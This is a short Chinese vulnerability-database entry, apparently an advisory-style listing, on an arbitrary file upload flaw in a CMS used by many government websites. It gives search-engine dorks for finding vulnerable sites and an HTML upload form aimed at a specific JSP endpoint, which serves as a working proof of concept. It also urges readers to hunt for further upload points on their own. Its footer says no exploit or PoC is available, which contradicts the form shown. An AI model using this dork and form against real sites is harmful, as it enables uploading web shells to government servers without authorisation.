科创政府信息公示框架任意文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

inurl:comm_front inurl:comm_front/email 该CMS多被政府网站所使用 本CMS除了POC中提到的上传点,还有很多上传点。请自行寻找。 如何寻找上传文件夹地址可以通过网站中包含上传页面的页面源代码信息获取 提交表单: ``` <form action="http://******/comm_front/tzzx/uploadImageFile_do.jsp?uri=/" method="post" name="uploadform" enctype="multipart/form-data"> <input type="file" name="NewFile"> <input type="submit"> </form> ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息